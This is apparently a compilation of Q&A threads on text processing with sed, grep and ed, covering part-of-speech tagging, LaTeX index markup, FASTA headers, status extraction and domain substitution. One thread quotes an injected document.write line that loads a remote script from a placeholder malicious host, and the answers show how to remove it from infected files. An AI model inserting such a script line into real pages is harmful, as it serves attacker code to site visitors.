There is one definition per line, the format is "WORDPartOfSpeech"
The task is to process the document, adding the part of speech
whenever it's defined. No re-formatting should be done.
For example, if the lexicon is
THE article
BIG adjective
BALL noun
and the document is
The big red ball fell.
Then the output should be
The/article big/adjective red ball/noun fell.
If I put the lexicon in a database table as 2 fields and I ran an SQL select that outputted as 1 comma separated line in the following format: "The/article,big/adjective,ball/noun" then how would I take that line and process it against the document so that it is outputted like above?
You should modify your sql query to preserve any words that don't match a term in your lexicon (perhaps by using an outer join; if you show us that query we could give you more specific advice). Then, assuming your output then looks something like this (with just a / following each term that didn't match your lexicon):
The/article big/adjective red/ ball/noun fell/.
You could clean it up with sed like this (assuming the string had been saved in a variable called $variablename:
sed 's_\/\([ .]\)_\1_g' <(echo "$variablename")
Explanation:
I used _ instead of / to delimit my s command for legibility. The syntax s/search/replace/g is synonymous with s_search_replace_g.
\/\([ .]\) tells sed to match anything with a literal / (escaped as \/) followed by either a space or a period [ .]. anything matching this pattern is stored into a reference because of the \( and \) surrounding the pattern.
\1 in the replacement pattern is the backreference I mentioned earlier. This works like a variable storing the matched portion we surrounded with parentheses in the search pattern. In effect, I've told sed to strip out any forward slashes that are followed by a space or a period, without stripping away the space or period itself.
Output:
The/article big/adjective red ball/noun fell.
Related
I have a command like this, it is marking words to appear in an index in the document:
sed -i "s/\b$line\b/\\\keywordis\{$line\}\{$wordis\}\{$definitionis\}/g" file.txt
The problem is, it is finding matches within existing matches, which means its e.g. "hello" is replaced with \keywordis{hello}{a common greeting}, but then "greeting" might be searched too, and \keywordis{hello}{a common \keywordis{greeting}{a phrase used when meeting someone}}...
How can I tell sed to perform the replacement, but ignore text that is already inside curly brackets?
Curley brackets in this case will always appear on the same line.
How can I tell sed to perform the replacement, but ignore text that is already inside curly brackets?
First tokenize input. Place something unique, like | or byte \x01 between every \keywordis{hello}{a common greeting} and store that in hold space. Something along s/\\the regex to match{hello}{a common greeting}/\x01&\x01/g'.
Ten iterate over elements in hold space. Use \n to separate elements already parsed from not parsed - input from output. If the element matches the format \keywordis{hello}{a common greeting}, just move it to the front before the newline in hold space, if it does not, perform the replacement. Here's an example: Identify and replace selective space inside given text file , it uses double newline \n\n as input/output separator.
Because, as you noted, replacements can have overlapping words with the patterns you are searching for, I believe the simplest would be after each replacement shuffling the pattern space like for ready output and starting the process all over for the current line.
Then on the end, shuffle the hold space to remove \x01 and newline and any leftovers and output.
Overall, it's Latex. I believe it would be simpler to do it manually.
By "eating" the string from the back and placing it in front of input/output separator inside pattern space, I simplified the process. The following program:
sed '
# add our input/output separator - just a newline
s/^/\n/
: loop
# l1000
# Ignore any "\keywords" and "{stuff}"
/^\([^\n]*\)\n\(.*\)\(\\[^{}]*\|{[^{}]*}\)$/{
s//\3\1\n\2/
b loop
}
# Replace hello followed by anthing not {}
# We match till the end because regex is greedy
# so that .* will eat everything.
/^\([^\n]*\)\n\(.*\)hello\([{}]*\)$/{
s//\\keywordis{hello}{a common greeting}\3\1\n\2/
b loop
}
# Hello was not matched - ignore anything irrelevant
# note - it has to match at least one character after newline
/^\([^\n]*\)\n\(.*\)\([^{}]\+\)$/{
s//\3\1\n\2/
b loop
}
s/\n//
' <<<'
\keywordis{hello}{hello} hello {some other hello} another hello yet
'
outputs:
\keywordis{hello}{hello} \keywordis{hello}{a common greeting} {some other hello} another \keywordis{hello}{a common greeting} yet
I have the following line:
>XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGTCAAATCAATGATATGATTTTATCTCTTCTTAGTAAAGGTAGACTTATAATTAG
AGAAAACAAC
I would like to convert the first line as follows:
>INITWORD/XXX-220_5004_COVID-A6/FINALWORD
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT...
So far I have managed to add the first word as follows:
sed 's/>/>INITTWORD\//I'
That returns:
>INITWORD/XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT
How can i add the FINALWORD at the end of the first line?
Just substitute more. sed conveniently allows you to recall the text you matched with a back reference, so just embed that between the things you want to add.
sed 's%^>\(.*\)%>INITWORD/\1/FINALWORD%I' file.fasta
I also added a ^ beginning-of-line anchor, and switched to % delimiters so the slashes don't need to be escaped.
In some more detail, the s command's syntax is s/regex/replacement/flags where regex is a regular expression to match the text you want to replace, and replacement is the text to replace it with. In the regex, you can use grouping parentheses \(...\) to extract some of the matched text into the replacement; so \1 refers to whatever matched the first set of grouping parentheses, \2 to the second, etc. The /flags are optional single-character specifiers which modify the behavior of the command; so for example, a /g flag says to replace every match on a line, instead of just the first one (but we only expect one match per line so it's not necessary or useful here).
The I flag is non-standard but since you are using that, I assume it does something useful for you.
I've got an application that has no useful api implemented, and the only way to get certain information is to parse string output. This is proving to be very painful...
I'm trying to achieve this in bash on SLES12.
Given I have the following strings:
QMNAME(QMTKGW01) STATUS(Running)
QMNAME(QMTKGW01) STATUS(Ended normally)
I want to extract the STATUS value, ie "Ended normally" or "Running".
Note that the line structure can move around, so I can't count on the "STATUS" being the second field.
The closest I have managed to get so far is to extract a single word from inside STATUS like so
echo "QMNAME(QMTKGW01) STATUS(Running)" | sed "s/^.*STATUS(\(\S*\)).*/\1/"
This works for "Running" but not for "Ended normally"
I've tried switching the \S* for [\S\s]* in both "grep -o" and "sed" but it seems to corrupt the entire regex.
This is purely a regex issue, by doing \S you requested to match non-white space characters within (..) but the failing case has a space between which does not comply with the grammar defined. Make it simple by explicitly calling out the characters to match inside (..) as [a-zA-Z ]* i.e. zero or more upper & lower case characters and spaces.
sed 's/^.*STATUS(\([a-zA-Z ]*\)).*/\1/'
Or use character classes [:alnum:] if you want numbers too
sed 's/^.*STATUS(\([[:alnum:] ]*\)).*/\1/'
sed 's/.*STATUS(\([^)]*\)).*/\1/' file
Output:
Running
Ended normally
Extracting a substring matching a given pattern is a job for grep, not sed. We should use sed when we must edit the input string. (A lot of people use sed and even awk just to extract substrings, but that's wasteful in my opinion.)
So, here is a grep solution. We need to make some assumptions (in any solution) about your input - some are easy to relax, others are not. In your example the word STATUS is always capitalized, and it is immediately followed by the opening parenthesis (no space, no colon etc.). These assumptions can be relaxed easily. More importantly, and not easy to work around: there are no nested parentheses. You will want the longest substring of non-closing-parenthesis characters following the opening parenthesis, no mater what they are.
With these assumptions:
$ grep -oP '\bSTATUS\(\K[^)]*(?=\))' << EOF
> QMNAME(QMTKGW01) STATUS(Running)
> QMNAME(QMTKGW01) STATUS(Ended normally)
> EOF
Running
Ended normally
Explanation:
Command options: o to return only the matched substring; P to use Perl extensions (the \K marker and the lookahead). The regexp: we look for a word boundary (\b) - so the word STATUS is a complete word, not part of a longer word like SUBSTATUS; then the word STATUS and opening parenthesis. This is required for a match, but \K instructs that this part of the matched string will not be returned in the output. Then we seek zero or more non-closing-parenthesis characters ([^)]*) and we require that this be followed by a closing parenthesis - but the closing parenthesis is also not included in the returned string. That's a "lookahead" (the (?= ... ) construct).
I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js
You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashed and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline
character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be
treated literally. For example, in the context address \xabc\xdefx, the RE
delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.
To all,
I have spent alot of time searching for a solution to this but cannot find it.
Just for a background, I have a text database with thousands of records. Each record is delineated by :
"0 #nnnnnn# Xnnn" // no quotes
The records have many fields on a line of their own, but the field I am interested in to search and replace a substring (notice spaces) :
" 1 X94 User1.faculty.ventura.ca" // no quotes
I want to use sed to change the substring ".faculty.ventura.ca" to ".students.moorpark.ut", changing nothing else on the line, globally for ALL records.
I have tested many things with negative results.
How can this be done ?
Thank You for the assistance.
Bob Perez (robertperez1957#gmail.com)
If I understand you correctly, you want this:
sed 's/1 X94 \(.*\).faculty.ventura.ca/1 X94 \1.students.moorpark.ut/' mydatabase.file
This will replace all records of the form 1 X94 XXXXXX.faculty.ventura.ca with 1 X94 XXXXX.students.moorpark.ut.
Here's details on what it all does:
The '' let you have spaces and other messes in your script.
s/ means substitute
1 X94 \(.*\).faculty.ventura.ca is what you'll be substituting. The \(.*\) stores anything in that regular expression for use in the replacement
1 X94 \1.students.moorpark.ut is what to replace the thing you found with. \1 is filled in with the first thing that matched \(.*\). (You can have multiple of those in one line, and the next one would then be \2.)
The final / just tells sed that you're done. If your database doesn't have linefeeds to separate its records, you'll want to end with /g, to make this change multiple times per line.
mydatabase.file should be the filename of your database.
Note that this will output to standard out. You'll probably want to add
> mynewdatabasefile.name
to the end of your line, to save all the output in a file. (It won't do you much good on your terminal.)
Edit, per your comments
If you want to replace 1 F94 bperez.students.Napvil.NCC to 1 F94 bperez.JohnSmith.customer, you can use another set of \(.*\), as:
sed 's/1 X94 \(.*\).\(.*\).Napvil.NCC/1 X94 \1.JohnSmith.customer/' 251-2.txt
This is similar to the above, except that it matches two stored parameters. In this example, \1 evaluates to bperez and \2 evaluates to students. We match \2, but don't use it in the replace part of the expression.
You can do this with any number of stored parameters. (Sed probably has some limit, but I've never hit a sufficiently complicated string to hit it.) For example, we could make the sed script be '\(.\) \(...\) \(.*\).\(.*\).\(.*\).\(.*\)/\1 \2 \3.JohnSmith.customer/', and this would make \1 = 1, \2 = X94, \3 = bperez, \4 = Napvil and \5 = NCC, and we'd ignore \4 and \5. This is actually not the best answer though - just showing it can be done. It's not the best because it's uglier, and also because it's more accepting. It would then do a find and replace on a line like 2 Z12 bperez.a.b.c, which is presumably not what you want. The find query I put in the edit is as specific as possible while still being general enough to suit your tasks.
Another edit!
You know how I said "be as specific as possible"? Due to the . character being special, I wasn't. In fact, I was very generic. The . means "match any character at all," instead of "match a period". Regular expressions are "greedy", matching the most they could, so \(.*\).\(.*\) will always fill the first \(.*\) (which says, "take 0 to many of any character and save it as a match for later") as far as it can.
Try using:
sed 's/1 X94 \(.*\)\.\(.*\).Napvil.NCC/1 X94 \1.JohnSmith.customer/' 251-2.txt
That extra \ acts as an escape sequence, and changes the . from "any character" to "just the period". FYI, since I don't (but should) escape the other periods, technically sed would consider 1 X94 XXXX.StdntZNapvilQNCC as a valid match. Since . means any character, a Z or a Q there would be considered a fit.
The following tutorial helped me
sed - replace substring in file
try the same using a -i prefix to replace in the file directly
sed -i 's/unix/linux/' file.txt